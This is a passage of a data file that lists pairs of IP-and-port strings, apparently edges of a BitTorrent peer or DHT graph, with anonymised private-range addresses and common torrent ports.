('172.16.31.10:6881', '192.168.3.11:40564'),
('172.16.31.10:6881', '192.168.127.12:8699'),
('172.16.31.10:6881', '172.16.31.10:1087'),
('172.16.31.10:6881', '192.168.127.12:46762'),
('172.16.31.10:6881', '172.16.58.3:7299'),
('172.16.31.10:6881', '172.16.17.32:9573'),
('172.16.31.10:6881', '172.16.58.3:21980'),
('172.16.31.10:6881', '172.16.17.32:18251'),
('172.16.31.10:6881', '192.168.3.11:17154'),
('172.16.31.10:6881', '172.16.31.10:6881'),
('172.16.31.10:6881', '172.16.17.32:55051'),
('172.16.31.10:6881', '192.168.127.12:49547'),
('172.16.31.10:6881', '172.16.17.32:55091'),
('172.16.31.10:6881', '172.16.31.10:6881'),
('172.16.31.10:6881', '172.16.58.3:43896'),
('172.16.31.10:6881', '172.16.58.3:32537'),
('172.16.31.10:6881', '192.168.127.12:57275'),
('172.16.31.10:6881', '172.16.31.10:33719'),
('172.16.31.10:6881', '172.16.58.3:23194'),
('172.16.31.10:6881', '172.16.17.32:58485'),
('172.16.31.10:6881', '172.16.17.32:10083'),
('172.16.31.10:6881', '192.168.3.11:6881'),
('172.16.31.10:6881', '172.16.58.3:49272'),
('172.16.31.10:6881', '172.16.17.32:62348'),
('172.16.31.10:6881', '172.16.58.3:6881'),
('172.16.31.10:6881', '192.168.3.11:6881'),
('172.16.31.10:6881', '172.16.17.32:30106'),
('172.16.31.10:6881', '172.16.31.10:44444'),
('172.16.31.10:6881', '192.168.127.12:33009'),
('172.16.31.10:6881', '172.16.17.32:50321'),
('172.16.31.10:6881', '172.16.31.10:14041'),
('172.16.31.10:6881', '172.16.17.32:44974'),
('172.16.31.10:6881', '172.16.58.3:54292'),
('172.16.31.10:6881', '172.16.17.32:54998'),
('172.16.31.10:6881', '192.168.3.11:41242'),
('172.16.31.10:6881', '172.16.17.32:12844'),
('172.16.31.10:6881', '172.16.58.3:50321'),
('172.16.31.10:6881', '192.168.3.11:55259'),
('172.16.31.10:6881', '192.168.3.11:27159'),
('172.16.31.10:6881', '172.16.58.3:64176'),
('172.16.31.10:6881', '172.16.58.3:40500'),
('172.16.31.10:6881', '192.168.3.11:50321'),
('172.16.31.10:6881', '172.16.31.10:6881'),
('172.16.31.10:6881', '192.168.3.11:35304'),
('172.16.31.10:6881', '172.16.17.32:16273'),
('172.16.31.10:6881', '172.16.31.10:7119'),
('172.16.31.10:6881', '192.168.127.12:1043'),
('172.16.31.10:6881', '172.16.31.10:22051'),
('172.16.31.10:6881', '172.16.17.32:12638'),
('172.16.31.10:6881', '192.168.3.11:48866'),
('172.16.31.10:6881', '192.168.127.12:42427'),
('172.16.31.10:6881', '172.16.31.10:35549'),
('172.16.31.10:6881', '172.16.17.32:23226'),
('172.16.31.10:6881', '172.16.31.10:3140'),
('172.16.31.10:6881', '192.168.127.12:18751'),
('172.16.31.10:6881', '192.168.127.12:54751'),
('172.16.31.10:6881', '192.168.3.11:8861'),
('172.16.31.10:6881', '172.16.31.10:32022'),
('172.16.31.10:6881', '192.168.127.12:21276'),
('172.16.31.10:6881', '172.16.17.32:48267'),
('172.16.31.10:6881', '192.168.3.11:51413'),
('172.16.31.10:6881', '172.16.31.10:17782'),
('172.16.31.10:6881', '172.16.17.32:6889'),
('172.16.31.10:6881', '172.16.17.32:50321'),
('172.16.31.10:6881', '192.168.127.12:24577'),
('172.16.31.10:6881', '172.16.58.3:2831'),
('172.16.31.10:6881', '172.16.58.3:28778'),
('172.16.31.10:6881', '192.168.127.12:41418'),
('172.16.31.10:6881', '172.16.31.10:6881'),
('172.16.31.10:6881', '172.16.17.32:39401'),
('172.16.31.10:6881', '192.168.127.12:47542'),
('172.16.31.10:6881', '192.168.127.12:26148'),
('172.16.31.10:6881', '192.168.3.11:43569'),
('172.16.31.10:6881', '172.16.58.3:20572'),
('172.16.31.10:6881', '172.16.58.3:54082'),
('172.16.31.10:6881', '172.16.17.32:6889'),
('172.16.31.10:6881', '172.16.58.3:6881'),
('172.16.31.10:6881', '192.168.127.12:37101'),
('172.16.31.10:6881', '192.168.3.11:6882'),
('172.16.31.10:6881', '192.168.3.11:6883'),
('172.16.31.10:6881', '172.16.17.32:12696'),
('172.16.31.10:6881', '172.16.31.10:50321'),
('172.16.31.10:6881', '192.168.127.12:34106'),
('172.16.31.10:6881', '172.16.58.3:53384'),
('172.16.31.10:6881', '192.168.127.12:43591'),
('172.16.31.10:6881', '172.16.17.32:21402'),
('172.16.31.10:6881', '192.168.3.11:12119'),
('172.16.31.10:6881', '172.16.31.10:43552'),
('172.16.31.10:6881', '192.168.127.12:6881'),
('172.16.31.10:6881', '172.16.17.32:44500'),
('172.16.31.10:6881', '192.168.127.12:6881'),
('172.16.31.10:6881', '172.16.17.32:47821'),
('172.16.31.10:6881', '192.168.127.12:22866'),
('172.16.31.10:6881', '172.16.58.3:8999'),
('172.16.31.10:6881', '172.16.17.32:44238'),
('172.16.31.10:6881', '172.16.17.32:24227'),
('172.16.31.10:6881', '192.168.3.11:24678'),
('172.16.31.10:6881', '192.168.127.12:5120'),
('172.16.31.10:6881', '192.168.3.11:32866'),
('172.16.31.10:6881', '192.168.3.11:50321'),
('172.16.31.10:6881', '172.16.17.32:54622'),
('172.16.31.10:6881', '172.16.17.32:6889'),
('172.16.31.10:6881', '192.168.127.12:6891'),
('172.16.31.10:6881', '172.16.58.3:53525'),
('172.16.31.10:6881', '172.16.17.32:6889'),
('172.16.31.10:6881', '172.16.17.32:29103'),
('172.16.31.10:6881', '172.16.31.10:60000'),
('172.16.31.10:6881', '172.16.31.10:25910'),
('172.16.31.10:6881', '172.16.17.32:1025'),
('172.16.31.10:6881', '192.168.3.11:25436'),
('172.16.31.10:6881', '172.16.31.10:9350'),
('172.16.31.10:6881', '192.168.127.12:16336'),
('172.16.31.10:6881', '172.16.17.32:6881'),
('172.16.31.10:6881', '172.16.17.32:6881'),
('172.16.31.10:6881', '192.168.127.12:26532'),
('172.16.31.10:6881', '192.168.3.11:50321'),
('172.16.31.10:6881', '172.16.58.3:6889'),
('172.16.31.10:6881', '172.16.58.3:64516'),
('172.16.31.10:6881', '172.16.17.32:14639'),
('172.16.31.10:6881', '192.168.3.11:10594'),
('172.16.31.10:6881', '192.168.127.12:48627'),
('172.16.31.10:6881', '192.168.3.11:17308'),
('172.16.31.10:6881', '192.168.127.12:24196'),
('172.16.31.10:6881', '192.168.127.12:6889'),
('172.16.31.10:6881', '192.168.127.12:6999'),
('172.16.31.10:6881', '192.168.127.12:6881'),
('172.16.31.10:6881', '172.16.31.10:10269'),
('172.16.31.10:6881', '172.16.17.32:22837'),
('172.16.31.10:6881', '192.168.3.11:51652'),
('172.16.31.10:6881', '172.16.58.3:15969'),
('172.16.31.10:6881', '192.168.127.12:52971'),
('172.16.31.10:6881', '192.168.127.12:51413'),
('172.16.31.10:6881', '172.16.58.3:21011'),
('172.16.31.10:6881', '192.168.3.11:62864'),
('172.16.31.10:6881', '172.16.31.10:64879'),
('172.16.31.10:6881', '172.16.31.10:20347'),
('172.16.31.10:6881', '192.168.127.12:6889'),
('172.16.31.10:6881', '172.16.31.10:36635'),
('172.16.31.10:6881', '172.16.17.32:50411'),
('172.16.31.10:6881', '172.16.17.32:6881'),
('172.16.31.10:6881', '172.16.58.3:6881'),
('172.16.31.10:6881', '192.168.3.11:6889'),
('172.16.31.10:6881', '172.16.17.32:50321'),
('172.16.31.10:6881', '172.16.58.3:21011'),
('172.16.31.10:6881', '172.16.31.10:8649'),
('172.16.58.3:26888', '192.168.127.12:51413'),
('172.16.58.3:26888', '172.16.17.32:26746'),
('172.16.58.3:26888', '192.168.127.12:53302'),
('172.16.58.3:26888', '172.16.58.3:53793'),
('172.16.58.3:26888', '172.16.31.10:60202'),
('172.16.58.3:26888', '192.168.3.11:21942'),
('172.16.58.3:26888', '172.16.58.3:46445'),
('172.16.58.3:26888', '192.168.127.12:19765'),
('172.16.31.10:11049', '172.16.58.3:15128'),
('172.16.31.10:11049', '192.168.3.11:41063'),
('172.16.31.10:11049', '172.16.58.3:30322'),
('172.16.31.10:11049', '192.168.127.12:51413'),
('172.16.31.10:11049', '192.168.3.11:52138'),
('172.16.31.10:11049', '172.16.17.32:6889'),
('172.16.31.10:11049', '172.16.58.3:51413'),
('172.16.31.10:11049', '192.168.127.12:17404'),
('192.168.3.11:43459', '192.168.127.12:38438'),
('192.168.3.11:43459', '192.168.127.12:55120'),
('192.168.3.11:43459', '172.16.58.3:16264'),
('192.168.3.11:43459', '172.16.31.10:21173'),
('192.168.3.11:43459', '172.16.17.32:6881'),
('192.168.3.11:43459', '172.16.58.3:62958'),
('192.168.3.11:43459', '192.168.3.11:53362'),
('192.168.3.11:43459', '172.16.58.3:50931'),
('192.168.127.12:6895', '172.16.58.3:6881'),
('192.168.127.12:6895', '192.168.3.11:9092'),
('192.168.127.12:6895', '172.16.17.32:35071'),
('192.168.127.12:6895', '192.168.3.11:57670'),
('192.168.127.12:6895', '172.16.31.10:6881'),
('192.168.127.12:6895', '172.16.58.3:6881'),
('192.168.127.12:6895', '192.168.127.12:61588'),
('192.168.127.12:6895', '172.16.17.32:51413'),
('172.16.31.10:18763', '192.168.3.11:55619'),
('172.16.31.10:18763', '172.16.31.10:6898'),
('172.16.31.10:18763', '172.16.17.32:51415'),
('172.16.31.10:18763', '172.16.17.32:51486'),
('172.16.31.10:18763', '192.168.3.11:6881'),
('172.16.31.10:18763', '172.16.31.10:8621'),
('172.16.31.10:18763', '192.168.127.12:51440'),
('172.16.31.10:18763', '192.168.3.11:6881'),
('192.168.3.11:33298', '172.16.58.3:22889'),
('192.168.3.11:33298', '192.168.3.11:21942'),
('192.168.3.11:33298', '192.168.3.11:51413'),
('192.168.3.11:33298', '172.16.58.3:50321'),
('192.168.3.11:33298', '172.16.58.3:6881'),
('192.168.3.11:33298', '192.168.3.11:36468'),
('192.168.3.11:33298', '172.16.17.32:20711'),
('192.168.3.11:33298', '172.16.17.32:6881'),
('192.168.3.11:33298', '172.16.58.3:33971'),
('192.168.3.11:33298', '172.16.17.32:49160'),
('192.168.3.11:33298', '172.16.58.3:6881'),
('192.168.3.11:33298', '172.16.17.32:13715'),
('192.168.3.11:33298', '192.168.3.11:14098'),
('192.168.3.11:33298', '172.16.58.3:6881'),
('192.168.3.11:33298', '172.16.31.10:8999'),
('192.168.3.11:33298', '192.168.3.11:51413'),
('192.168.3.11:5343', '192.168.127.12:51413'),
('192.168.3.11:5343', '172.16.17.32:62408'),
('192.168.3.11:5343', '172.16.17.32:13159'),
('192.168.3.11:5343', '172.16.17.32:23800'),
('192.168.3.11:5343', '192.168.127.12:6881'),
('192.168.3.11:5343', '172.16.17.32:6881'),
('192.168.3.11:5343', '172.16.31.10:54817'),
('192.168.3.11:5343', '172.16.31.10:60871'),
('172.16.31.10:8441', '192.168.127.12:6881'),
('172.16.31.10:8441', '172.16.17.32:40640'),
('172.16.31.10:8441', '172.16.31.10:55186'),
('172.16.31.10:8441', '172.16.17.32:36269'),
('172.16.31.10:8441', '172.16.58.3:52111'),
('172.16.31.10:8441', '172.16.58.3:40500'),
('172.16.31.10:8441', '192.168.3.11:40538'),
('172.16.31.10:8441', '172.16.17.32:6881'),
('172.16.31.10:36161', '192.168.127.12:4370'),
('172.16.31.10:36161', '192.168.127.12:19771'),
('172.16.31.10:36161', '172.16.31.10:46065'),
('172.16.31.10:36161', '172.16.31.10:51413'),
('172.16.31.10:36161', '172.16.17.32:55020'),
('172.16.31.10:36161', '172.16.31.10:6883'),
('172.16.31.10:36161', '172.16.58.3:54427'),
('172.16.31.10:36161', '172.16.31.10:50109'),
('172.16.17.32:37321', '192.168.3.11:51413'),
('172.16.17.32:37321', '172.16.58.3:12350'),
('172.16.17.32:37321', '172.16.31.10:51413'),
('172.16.17.32:37321', '192.168.127.12:10573'),
('172.16.17.32:37321', '192.168.3.11:43417'),
('172.16.17.32:37321', '192.168.3.11:51413'),
('172.16.17.32:37321', '192.168.3.11:28113'),
('172.16.17.32:37321', '192.168.127.12:51413'),
('172.16.17.32:37321', '192.168.127.12:55120'),
('172.16.17.32:37321', '192.168.3.11:60395'),
('172.16.17.32:37321', '192.168.3.11:14072'),
('172.16.17.32:37321', '172.16.31.10:61425'),
('172.16.17.32:37321', '172.16.58.3:59081'),
('172.16.17.32:37321', '192.168.127.12:51413'),
('172.16.17.32:37321', '172.16.31.10:62270'),
('172.16.17.32:37321', '172.16.17.32:22585'),
('172.16.17.32:37321', '172.16.31.10:46013'),
('172.16.17.32:37321', '172.16.17.32:52594'),
('172.16.17.32:37321', '192.168.3.11:51413'),
('172.16.17.32:37321', '172.16.17.32:57664'),
('172.16.17.32:37321', '172.16.58.3:11179'),
('172.16.17.32:37321', '172.16.31.10:6889'),
('172.16.17.32:37321', '172.16.58.3:11775'),
('172.16.17.32:37321', '172.16.31.10:10042'),
('172.16.17.32:61633', '172.16.17.32:50321'),
('172.16.17.32:61633', '172.16.58.3:51413'),
('172.16.17.32:61633', '192.168.127.12:51413'),
('172.16.17.32:61633', '172.16.31.10:51413'),
('172.16.17.32:61633', '192.168.127.12:6881'),
('172.16.17.32:61633', '172.16.31.10:15765'),
('172.16.17.32:61633', '172.16.17.32:8999'),
('172.16.17.32:61633', '172.16.17.32:6889'),
('172.16.31.10:55625', '192.168.127.12:6887'),
('172.16.31.10:55625', '172.16.17.32:8999'),
('172.16.31.10:55625', '192.168.3.11:29492'),
('172.16.31.10:55625', '172.16.17.32:46837'),
('172.16.31.10:55625', '192.168.3.11:51413'),
('172.16.31.10:55625', '172.16.31.10:17559'),
('172.16.31.10:55625', '172.16.17.32:55130'),
('172.16.31.10:55625', '172.16.58.3:6882'),
('192.168.3.11:1733', '172.16.58.3:51413'),
('192.168.3.11:1733', '172.16.58.3:6881'),
('192.168.3.11:1733', '192.168.3.11:50062'),
('192.168.3.11:1733', '192.168.127.12:64386'),
('192.168.3.11:1733', '192.168.127.12:15890'),
('192.168.3.11:1733', '192.168.127.12:50321'),
('192.168.3.11:1733', '172.16.31.10:58716'),
('192.168.3.11:64907', '172.16.58.3:51413'),
('192.168.3.11:64907', '192.168.3.11:6881'),
('192.168.3.11:64907', '172.16.31.10:51417'),
('192.168.3.11:64907', '172.16.31.10:6881'),
('192.168.3.11:64907', '172.16.17.32:6881'),
('192.168.3.11:64907', '192.168.3.11:35681'),
('192.168.3.11:64907', '192.168.127.12:16615'),
('192.168.3.11:64907', '172.16.31.10:50118'),
('172.16.31.10:9089', '192.168.127.12:51413'),
('172.16.31.10:9089', '172.16.58.3:23616'),
('172.16.31.10:9089', '172.16.17.32:51413'),
('172.16.31.10:9089', '172.16.58.3:14962'),
('172.16.31.10:9089', '172.16.17.32:11505'),
('172.16.31.10:9089', '172.16.31.10:6889'),
('172.16.31.10:9089', '172.16.17.32:41944'),
('172.16.31.10:9089', '172.16.58.3:1167'),
('172.16.31.10:9089', '172.16.58.3:30095'),
('172.16.31.10:9089', '172.16.31.10:51416'),
('172.16.31.10:9089', '172.16.17.32:11841'),
('172.16.31.10:9089', '192.168.3.11:50321'),
('172.16.31.10:9089', '172.16.31.10:27906'),
('172.16.31.10:9089', '172.16.58.3:6983'),
('172.16.31.10:9089', '192.168.3.11:54822'),
('172.16.31.10:9089', '172.16.17.32:51413'),
('172.16.31.10:9089', '192.168.127.12:50321'),
('172.16.31.10:9089', '192.168.127.12:50321'),
('172.16.31.10:9089', '192.168.127.12:51413'),
('172.16.31.10:9089', '192.168.127.12:1156'),
('172.16.31.10:9089', '172.16.58.3:50931'),
('172.16.31.10:9089', '192.168.3.11:6881'),
('172.16.31.10:9089', '172.16.31.10:54393'),
('172.16.31.10:9089', '172.16.17.32:54283'),
('192.168.3.11:19183', '172.16.17.32:6881'),
('192.168.3.11:19183', '172.16.31.10:51437'),
('192.168.3.11:19183', '172.16.17.32:63812'),
('192.168.3.11:19183', '172.16.31.10:28062'),
('192.168.3.11:19183', '192.168.3.11:30901'),
('192.168.3.11:19183', '192.168.127.12:37933'),
('192.168.3.11:19183', '192.168.127.12:10821'),
('192.168.3.11:19183', '172.16.17.32:6889'),
('172.16.17.32:48593', '172.16.58.3:30794'),
('172.16.17.32:48593', '172.16.58.3:60965'),
('172.16.17.32:48593', '192.168.3.11:55199'),
('172.16.17.32:48593', '172.16.58.3:19028'),
('172.16.17.32:48593', '192.168.3.11:4264'),
('172.16.17.32:48593', '172.16.17.32:60958'),
('172.16.17.32:48593', '172.16.31.10:52733'),
('172.16.17.32:48593', '192.168.3.11:39517'),
('172.16.58.3:6881', '172.16.58.3:40684'),
('172.16.58.3:6881', '172.16.58.3:51413'),
('172.16.58.3:6881', '192.168.127.12:59989'),
('172.16.58.3:6881', '172.16.17.32:51413'),
('172.16.58.3:6881', '172.16.58.3:51415'),
('172.16.58.3:6881', '172.16.31.10:41506'),
('172.16.58.3:6881', '172.16.17.32:46369'),
('172.16.58.3:6881', '192.168.3.11:36583'),
('172.16.17.32:51413', '172.16.17.32:51413'),
('172.16.17.32:51413', '172.16.31.10:51413'),
('172.16.17.32:51413', '192.168.3.11:51413'),
('172.16.17.32:51413', '192.168.3.11:51413'),
('172.16.17.32:51413', '172.16.58.3:6881'),
('172.16.17.32:51413', '192.168.127.12:60912'),
('172.16.17.32:51413', '172.16.58.3:51413'),
('172.16.17.32:51413', '172.16.17.32:51413'),
('172.16.17.32:51413', '192.168.127.12:6881'),
('172.16.17.32:51413', '172.16.31.10:51437'),
('172.16.17.32:51413', '192.168.127.12:56272'),
('172.16.17.32:51413', '172.16.31.10:63914'),
('172.16.17.32:51413', '192.168.3.11:51413'),
('172.16.17.32:51413', '172.16.17.32:6881'),
('172.16.17.32:51413', '192.168.127.12:6881'),
('172.16.17.32:51413', '192.168.127.12:64427'),
('172.16.17.32:51413', '172.16.58.3:12902'),
('172.16.17.32:51413', '192.168.127.12:53405'),
('172.16.17.32:51413', '172.16.58.3:41821'),
('172.16.17.32:51413', '172.16.31.10:62867'),
('172.16.17.32:51413', '172.16.17.32:18344'),
('172.16.17.32:51413', '192.168.3.11:28395'),
('172.16.17.32:51413', '172.16.31.10:6881'),
('172.16.17.32:51413', '172.16.17.32:12567'),
('172.16.17.32:51413', '172.16.17.32:51413'),
('172.16.17.32:51413', '192.168.127.12:6881'),
('172.16.17.32:51413', '192.168.3.11:56789'),
('172.16.17.32:51413', '192.168.127.12:8999'),
('172.16.17.32:51413', '172.16.58.3:63229'),
('172.16.17.32:51413', '172.16.31.10:38589'),
('172.16.17.32:51413', '172.16.58.3:8999'),
('172.16.17.32:51413', '172.16.31.10:41537'),
('172.16.17.32:23428', '192.168.127.12:61937'),
('172.16.17.32:23428', '192.168.127.12:51413'),
('172.16.17.32:23428', '192.168.3.11:52166'),
('172.16.17.32:23428', '172.16.31.10:61425'),
('172.16.17.32:23428', '192.168.127.12:51413'),
('172.16.17.32:23428', '172.16.31.10:44426'),
('172.16.17.32:23428', '192.168.127.12:54240'),
('172.16.17.32:23428', '172.16.31.10:38905'),
('192.168.3.11:56808', '192.168.3.11:6881'),
('192.168.3.11:56808', '192.168.3.11:22807'),
('192.168.3.11:56808', '192.168.127.12:8999'),
('192.168.3.11:56808', '192.168.127.12:51413'),
('192.168.3.11:56808', '172.16.31.10:6881'),
('192.168.3.11:56808', '192.168.127.12:6889'),
('192.168.3.11:56808', '172.16.58.3:6881'),
('192.168.3.11:56808', '172.16.58.3:50500'),
('172.16.31.10:48381', '172.16.17.32:10721'),
('172.16.31.10:48381', '172.16.31.10:33249'),
('172.16.31.10:48381', '172.16.58.3:21073'),
('172.16.31.10:48381', '192.168.3.11:32705'),
('172.16.31.10:48381', '172.16.17.32:7111'),
('172.16.31.10:48381', '172.16.17.32:36693'),
('172.16.31.10:48381', '192.168.127.12:9497'),
('172.16.31.10:48381', '172.16.31.10:10819'),
('172.16.31.10:48381', '192.168.3.11:50321'),
('172.16.31.10:48381', '172.16.17.32:6881'),
('172.16.31.10:48381', '192.168.3.11:36159'),
('172.16.31.10:48381', '172.16.31.10:23517'),
('172.16.31.10:48381', '172.16.58.3:11272'),
('172.16.31.10:48381', '192.168.127.12:50321'),
('172.16.31.10:48381', '192.168.3.11:6881'),
('172.16.31.10:48381', '192.168.3.11:3826'),
('172.16.58.3:41039', '172.16.17.32:54727'),
('172.16.58.3:41039', '172.16.58.3:8999'),
('172.16.58.3:41039', '172.16.17.32:46126'),
('172.16.58.3:41039', '192.168.3.11:20299'),
('172.16.58.3:41039', '172.16.17.32:49001'),
('172.16.58.3:41039', '172.16.58.3:50931'),
('172.16.58.3:41039', '192.168.127.12:17995'),
('172.16.58.3:41039', '192.168.127.12:3336'),
('172.16.17.32:6889', '172.16.17.32:49001'),
('172.16.17.32:6889', '172.16.17.32:25120'),
('172.16.17.32:6889', '172.16.17.32:3237'),
('172.16.17.32:6889', '192.168.127.12:8999'),
('172.16.17.32:6889', '172.16.58.3:46903'),
('172.16.17.32:6889', '192.168.127.12:8999'),
('172.16.17.32:6889', '172.16.58.3:53884'),
('172.16.17.32:6889', '192.168.127.12:49001'),
('192.168.3.11:6881', '172.16.31.10:35348'),
('192.168.3.11:6881', '172.16.58.3:11850'),
('192.168.3.11:6881', '192.168.127.12:6881'),
('192.168.3.11:6881', '172.16.17.32:8999'),
('192.168.3.11:6881', '172.16.17.32:60819'),
('192.168.3.11:6881', '192.168.3.11:13599'),
('192.168.3.11:6881', '192.168.3.11:6881'),
('192.168.3.11:6881', '172.16.31.10:48259'),
('192.168.3.11:33560', '172.16.17.32:51415'),
('192.168.3.11:33560', '192.168.3.11:50321'),
('192.168.3.11:33560', '172.16.58.3:6881'),
('192.168.3.11:33560', '172.16.31.10:46936'),
('192.168.3.11:33560', '192.168.127.12:51440'),
('192.168.3.11:33560', '192.168.3.11:6881'),
('192.168.3.11:33560', '192.168.127.12:6881'),
('192.168.3.11:33560', '172.16.31.10:16819'),
('172.16.58.3:64615', '172.16.58.3:9378'),
('172.16.58.3:64615', '172.16.31.10:53118'),
('172.16.58.3:64615', '172.16.31.10:51509'),
('172.16.58.3:64615', '172.16.31.10:6943'),
('172.16.58.3:64615', '192.168.127.12:31939'),
('172.16.58.3:64615', '192.168.127.12:31364'),
('172.16.58.3:64615', '172.16.58.3:38260'),
('172.16.58.3:64615', '192.168.3.11:6881'),
('172.16.17.32:13531', '192.168.3.11:37332'),
('172.16.17.32:13531', '172.16.58.3:54318'),
('172.16.17.32:13531', '192.168.127.12:51413'),
('172.16.17.32:13531', '172.16.58.3:55131'),
('172.16.17.32:13531', '192.168.3.11:57924'),
('172.16.17.32:13531', '172.16.31.10:23290'),
('172.16.17.32:13531', '172.16.31.10:19857'),
('172.16.17.32:13531', '172.16.17.32:1051'),
('192.168.3.11:51413', '172.16.31.10:51413'),
('192.168.3.11:51413', '192.168.127.12:21415'),
('192.168.3.11:51413', '192.168.3.11:1046'),
('192.168.3.11:51413', '172.16.17.32:3074'),
('192.168.3.11:51413', '192.168.127.12:50321'),
('192.168.3.11:51413', '172.16.31.10:50321'),
('192.168.3.11:51413', '172.16.31.10:47505'),
('192.168.3.11:51413', '172.16.31.10:26865'),
('192.168.127.12:6881', '172.16.17.32:6889'),
('192.168.127.12:6881', '192.168.127.12:21753'),
('192.168.127.12:6881', '192.168.127.12:50047'),
('192.168.127.12:6881', '172.16.58.3:32697'),
('192.168.127.12:6881', '172.16.17.32:51486'),
('192.168.127.12:6881', '172.16.31.10:53374'),
('192.168.127.12:6881', '172.16.58.3:57935'),
('192.168.127.12:6881', '192.168.127.12:64327'),
('172.16.31.10:59518', '172.16.58.3:3931'),
('172.16.31.10:59518', '192.168.127.12:6339'),
('172.16.31.10:59518', '172.16.31.10:47001'),
('172.16.31.10:59518', '172.16.58.3:51413'),
('172.16.31.10:59518', '192.168.3.11:54851'),
('172.16.31.10:59518', '192.168.3.11:35286'),
('172.16.31.10:59518', '172.16.58.3:51413'),
('172.16.31.10:59518', '172.16.31.10:5852'),
('172.16.31.10:59518', '172.16.58.3:28016'),
('172.16.31.10:59518', '192.168.127.12:32216'),
('172.16.31.10:59518', '172.16.17.32:54394'),
('172.16.31.10:59518', '172.16.31.10:51413'),
('172.16.31.10:59518', '172.16.17.32:51413'),
('172.16.31.10:59518', '172.16.31.10:61425'),
('172.16.31.10:59518', '192.168.3.11:6889'),
('172.16.31.10:59518', '192.168.127.12:55011'),
('172.16.31.10:59518', '192.168.127.12:26503'),
('172.16.31.10:59518', '192.168.127.12:6889'),
('172.16.31.10:59518', '192.168.3.11:51413'),
('172.16.31.10:59518', '172.16.58.3:43891'),
('172.16.31.10:59518', '192.168.3.11:51413'),
('172.16.31.10:59518', '172.16.58.3:49200'),
('172.16.31.10:59518', '192.168.3.11:55366'),
('172.16.31.10:59518', '172.16.17.32:11051'),
('172.16.31.10:59518', '192.168.3.11:31240'),
('172.16.31.10:59518', '172.16.31.10:8999'),
('172.16.31.10:59518', '172.16.58.3:51413'),
('172.16.31.10:59518', '192.168.3.11:63537'),
('172.16.31.10:59518', '172.16.58.3:12318'),
('172.16.31.10:59518', '172.16.17.32:3123'),
('172.16.31.10:59518', '192.168.3.11:51413'),
('192.168.127.12:43026', '172.16.17.32:51413'),
('192.168.127.12:43026', '172.16.58.3:48000'),
('192.168.127.12:43026', '172.16.31.10:8102'),
('192.168.127.12:43026', '172.16.58.3:21607'),
('192.168.127.12:43026', '192.168.127.12:51413'),
('192.168.127.12:43026', '192.168.3.11:6881'),
('192.168.127.12:43026', '172.16.17.32:49834'),
('192.168.127.12:43026', '192.168.127.12:62348'),
('172.16.31.10:6881', '172.16.31.10:28034'),
('172.16.31.10:6881', '172.16.31.10:28141'),
('172.16.31.10:6881', '172.16.31.10:5947'),
('172.16.31.10:6881', '192.168.127.12:55883'),
('172.16.31.10:6881', '172.16.58.3:51413'),
('172.16.31.10:6881', '172.16.31.10:61425'),
('172.16.31.10:6881', '172.16.17.32:8999'),
('172.16.31.10:6881', '172.16.31.10:54981'),
('172.16.31.10:6881', '192.168.3.11:61270'),
('172.16.31.10:6881', '172.16.58.3:6889'),
('172.16.31.10:6881', '192.168.127.12:6881'),
('172.16.31.10:6881', '172.16.58.3:6889'),
('172.16.31.10:6881', '192.168.127.12:55393'),
('172.16.31.10:6881', '172.16.58.3:42554'),
('172.16.31.10:6881', '192.168.127.12:60171'),
('172.16.31.10:6881', '172.16.58.3:45591'),
('172.16.31.10:23323', '172.16.58.3:6889'),
('172.16.31.10:23323', '172.16.31.10:40807'),
('172.16.31.10:23323', '192.168.127.12:6881'),
('172.16.31.10:23323', '172.16.31.10:6977'),
('172.16.31.10:23323', '192.168.127.12:51413'),
('172.16.31.10:23323', '172.16.31.10:34532'),
('172.16.31.10:23323', '172.16.17.32:56530'),
('172.16.31.10:23323', '172.16.58.3:28103'),
('172.16.31.10:23323', '192.168.127.12:30619'),
('172.16.31.10:23323', '192.168.3.11:6881'),
('172.16.31.10:23323', '172.16.17.32:47521'),
('172.16.31.10:23323', '192.168.127.12:51477'),
('172.16.31.10:23323', '172.16.31.10:12258'),
('172.16.31.10:23323', '172.16.58.3:6881'),
('172.16.31.10:23323', '192.168.127.12:40768'),
('172.16.31.10:23323', '172.16.17.32:44204'),
('172.16.31.10:23323', '192.168.127.12:51413'),
('172.16.31.10:23323', '192.168.127.12:6881'),
('172.16.31.10:23323', '172.16.31.10:48569'),
('172.16.31.10:23323', '172.16.31.10:6942'),
('172.16.31.10:23323', '172.16.31.10:44634'),
('172.16.31.10:23323', '192.168.127.12:31369'),
('172.16.31.10:23323', '192.168.127.12:51500'),
('172.16.31.10:23323', '172.16.58.3:6881'),
('172.16.31.10:23323', '192.168.3.11:55131'),
('172.16.31.10:23323', '172.16.58.3:37893'),
('172.16.31.10:23323', '172.16.58.3:52556'),
('172.16.31.10:23323', '192.168.127.12:54890'),
('172.16.31.10:23323', '172.16.17.32:62323'),
('172.16.31.10:23323', '192.168.3.11:6881'),
('172.16.31.10:23323', '172.16.58.3:51413'),
('172.16.31.10:23323', '172.16.17.32:50321'),
('172.16.31.10:36801', '172.16.58.3:56529'),
('172.16.31.10:36801', '172.16.31.10:60668'),
('172.16.31.10:36801', '172.16.17.32:53757'),
('172.16.31.10:36801', '192.168.3.11:37099'),
('172.16.31.10:36801', '172.16.31.10:59731'),
('172.16.31.10:36801', '172.16.58.3:36470'),
('172.16.31.10:36801', '192.168.127.12:6881'),
('172.16.31.10:36801', '172.16.17.32:34062'),
('192.168.127.12:51413', '192.168.127.12:34067'),
('192.168.127.12:51413', '192.168.3.11:49001'),
('192.168.127.12:51413', '172.16.17.32:33596'),
('192.168.127.12:51413', '192.168.3.11:26149'),
('192.168.127.12:51413', '192.168.3.11:30492'),
('192.168.127.12:51413', '192.168.127.12:51413'),
('192.168.127.12:51413', '172.16.31.10:6881'),
('192.168.127.12:51413', '172.16.58.3:55353'),
('192.168.3.11:6881', '172.16.31.10:51725'),
('192.168.3.11:6881', '172.16.58.3:62120'),
('192.168.3.11:6881', '172.16.58.3:29452'),
('192.168.3.11:6881', '172.16.58.3:15006'),
('192.168.3.11:6881', '172.16.31.10:35516'),
('192.168.3.11:6881', '192.168.3.11:6481'),
('192.168.3.11:6881', '192.168.127.12:6881'),
('192.168.3.11:6881', '192.168.127.12:21213'),
('172.16.17.32:1112', '172.16.58.3:14660'),
('172.16.17.32:1112', '192.168.3.11:28886'),
('172.16.17.32:1112', '172.16.31.10:51138'),
('172.16.17.32:1112', '172.16.17.32:51415'),
('172.16.17.32:1112', '172.16.58.3:11900'),
('172.16.17.32:1112', '172.16.58.3:51413'),
('172.16.17.32:1112', '172.16.58.3:49869'),
('172.16.17.32:1112', '192.168.3.11:51413'),
('172.16.17.32:1112', '172.16.31.10:45396'),
